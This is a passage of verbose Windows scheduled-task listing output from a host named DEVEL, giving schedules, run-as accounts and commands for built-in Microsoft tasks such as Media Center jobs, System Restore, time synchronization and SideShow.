Run As User: NETWORK SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\OCURActivate
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /OCURActivate
Start In: N/A
Comment: Privileged Media Center OCUR activation job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\OCURDiscovery
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0)
Start In: N/A
Comment: Privileged Media Center OCUR discovery job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\PBDADiscovery
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /PBDADiscovery
Start In: N/A
Comment: Privileged Media Center OCUR discovery job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\PBDADiscoveryW1
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery
Start In: N/A
Comment: Privileged Media Center OCUR discovery job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\PBDADiscoveryW2
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery
Start In: N/A
Comment: Privileged Media Center OCUR discovery job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\PeriodicScanRetry
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %windir%\ehome\MCUpdate.exe -pscn 0
Start In: N/A
Comment: Background periodic scanner - PeriodicScanRetry
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: NETWORK SERVICE
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: One Time Only
Start Time: 5:33:00
Start Date: 9/9/2006
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\PvrRecoveryTask
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: Multiple actions
Start In: Multiple actions
Comment: Perform Pvr Recovery activities
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: NETWORK SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\PvrScheduleTask
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: Multiple actions
Start In: Multiple actions
Comment: Perform PVR Scheduling activities
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: NETWORK SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\RecordingRestart
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehrec /RestartRecording
Start In: N/A
Comment: Restarts recordings after a power failure.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management: Stop On Battery Mode
Run As User: NETWORK SERVICE
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\RegisterSearch
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0)
Start In: N/A
Comment: Privileged Media Center Search registration job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\ReindexSearchRoot
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /DoReindexSearchRoot
Start In: N/A
Comment: Privileged Media Center Search Reindexing job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\SqlLiteRecoveryTask
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: Multiple actions
Start In: Multiple actions
Comment: Perform Data Recovery activities
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: NETWORK SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\UpdateRecordPath
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0)
Start In: N/A
Comment: Privileged Media Center Recorder Permission setting job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\MemoryDiagnostic
HostName: DEVEL
TaskName: \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: Task for launching the Memory Diagnostic
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: When an event occurs
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: Task for launching the Memory Diagnostic
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: When an event occurs
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\MobilePC
HostName: DEVEL
TaskName: \Microsoft\Windows\MobilePC\HotStart
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 28/12/2017 2:44:24
Last Result: 0
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: Launches applications configured for Windows HotStart
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: Authenticated Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\MUI
HostName: DEVEL
TaskName: \Microsoft\Windows\MUI\LPRemove
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 13/9/2019 6:16:07
Last Result: 0
Author: Microsoft Corporation
Task To Run: %windir%\system32\lpremove.exe
Start In: N/A
Comment: Launch language cleanup tool
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for 10 minutes, If Not Idle Retry For 10 minutes Stop the task if Idle State end
Power Management: No Start On Batteries
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 09:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\Multimedia
HostName: DEVEL
TaskName: \Microsoft\Windows\Multimedia\SystemSoundsService
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 28/12/2017 2:44:24
Last Result: 0
Author: N/A
Task To Run: COM handler
Start In: N/A
Comment: System Sounds User Mode Agent
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\NetTrace
HostName: DEVEL
TaskName: \Microsoft\Windows\NetTrace\GatherNetworkInfo
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft
Task To Run: %windir%\system32\gatherNetworkInfo.vbs
Start In: $(Arg1)
Comment: Network information collector
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode
Run As User: Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\Offline Files
HostName: DEVEL
TaskName: \Microsoft\Windows\Offline Files\Background Synchronization
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: This task controls periodic background synchronization of Offline Files when the user is working in an offline mode.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: Authenticated Users
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 24:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: One Time Only, Hourly
Start Time: 12:00:00
Start Date: 1/1/2008
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: 6 Hour(s), 0 Minute(s)
Repeat: Until: Time: None
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
HostName: DEVEL
TaskName: \Microsoft\Windows\Offline Files\Logon Synchronization
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: This task initiates synchronization of Offline Files when a user logs onto the system.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: Authenticated Users
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 24:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\PLA
INFO: There are no scheduled tasks presently available at your access level.
Folder: \Microsoft\Windows\Power Efficiency Diagnostics
HostName: DEVEL
TaskName: \Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem
Next Run Time: 24/9/2019 7:25:41
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 13/9/2019 6:10:36
Last Result: 0
Author: Microsoft Corporation
Task To Run: %SystemRoot%\System32\powercfg.exe -energy -auto
Start In: N/A
Comment: This job analyzes the system looking for conditions that may cause high energy use.
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for 5 minutes, If Not Idle Retry For 120 minutes
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 00:05:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Daily
Start Time: 6:00:00
Start Date: 1/1/2008
End Date: N/A
Days: Every 14 day(s)
Months: N/A
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
Folder: \Microsoft\Windows\RAC
HostName: DEVEL
TaskName: \Microsoft\Windows\RAC\RacTask
Next Run Time: 14/9/2019 3:12:49
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 14/9/2019 1:08:36
Last Result: 0
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: Microsoft Reliability Analysis task to process system reliability data.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: When an event occurs
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\RAC\RacTask
Next Run Time: 14/9/2019 3:07:44
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 14/9/2019 1:08:36
Last Result: 0
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: Microsoft Reliability Analysis task to process system reliability data.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: One Time Only, Hourly
Start Time: 12:00:00
Start Date: 31/3/2008
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: 1 Hour(s), 0 Minute(s)
Repeat: Until: Time: None
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
Folder: \Microsoft\Windows\Shell
HostName: DEVEL
TaskName: \Microsoft\Windows\Shell\WindowsParentalControls
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft
Task To Run: COM handler
Start In: N/A
Comment: Notifications for actions taken by Windows Parental Controls.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: Authenticated Users
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Shell\WindowsParentalControlsMigration
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: 14/7/2009 7:54:03
Last Result: 0
Author: Microsoft
Task To Run: COM handler
Start In: N/A
Comment: Migration for Windows Parental Controls.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\SideShow
HostName: DEVEL
TaskName: \Microsoft\Windows\SideShow\AutoWake
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: This task automatically wakes the computer and then puts it to sleep when automatic wake is turned on for a Windows SideShow-compatible device.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\SideShow\GadgetManager
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: This task manages and synchronizes metadata for the installed gadgets on a Windows SideShow-compatible device.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\SideShow\SessionAgent
Next Run Time: Disabled
Status: Could not start
Logon Mode: Interactive/Background
Last Run Time: 17/3/2017 4:17:56
Last Result: -2147023729
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: This task manages the session behavior when multiple user accounts exist on a Windows SideShow-compatible device.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: Users
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\SideShow\SystemDataProviders
Next Run Time: Disabled
Status: Could not start
Logon Mode: Interactive/Background
Last Run Time: 17/3/2017 4:18:11
Last Result: -2147023729
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: This task provides system data for the clock, power source, wireless network strength, and volume on a Windows SideShow-compatible device.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\SystemRestore
HostName: DEVEL
TaskName: \Microsoft\Windows\SystemRestore\SR
Next Run Time: 15/9/2019 12:00:00
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 14/9/2019 1:08:36
Last Result: 0
Author: Microsoft Corporation
Task To Run: %windir%\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation
Start In: N/A
Comment: This task creates regular system protection points.
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for 10 minutes, If Not Idle Retry For 1380 minutes
Power Management: No Start On Batteries
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Daily
Start Time: 12:00:00
Start Date: 14/6/2005
End Date: N/A
Days: Every 1 day(s)
Months: N/A
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
HostName: DEVEL
TaskName: \Microsoft\Windows\SystemRestore\SR
Next Run Time: 15/9/2019 12:00:00
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 14/9/2019 1:08:36
Last Result: 0
Author: Microsoft Corporation
Task To Run: %windir%\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation
Start In: N/A
Comment: This task creates regular system protection points.
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for 10 minutes, If Not Idle Retry For 1380 minutes
Power Management: No Start On Batteries
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\Tcpip
HostName: DEVEL
TaskName: \Microsoft\Windows\Tcpip\IpAddressConflict1
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: %windir%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem
Start In: N/A
Comment: This event is triggered when an IP address conflict is detected.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: When an event occurs
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Tcpip\IpAddressConflict2
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: %windir%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem
Start In: N/A
Comment: This event is triggered when an IP address conflict is detected.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: When an event occurs
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\TextServicesFramework
HostName: DEVEL
TaskName: \Microsoft\Windows\TextServicesFramework\MsCtfMonitor
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 28/12/2017 2:44:24
Last Result: 0
Author: N/A
Task To Run: COM handler
Start In: N/A
Comment: TextServicesFramework monitor task
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\Time Synchronization
HostName: DEVEL
TaskName: \Microsoft\Windows\Time Synchronization\SynchronizeTime
Next Run Time: 15/9/2019 1:00:00
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 13/9/2019 5:57:06
Last Result: 0
Author: Microsoft Corporation
Task To Run: %windir%\system32\sc.exe start w32time task_started
Start In: N/A
Comment: Maintains date and time synchronization on all clients and servers in the network. If this service is stopped, date and time synchronization will be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Weekly
Start Time: 1:00:00
Start Date: 1/1/2005
End Date: N/A
Days: SUN
Months: Every 1 week(s)
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
Folder: \Microsoft\Windows\Windows Error Reporting
HostName: DEVEL
TaskName: \Microsoft\Windows\Windows Error Reporting\QueueReporting
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
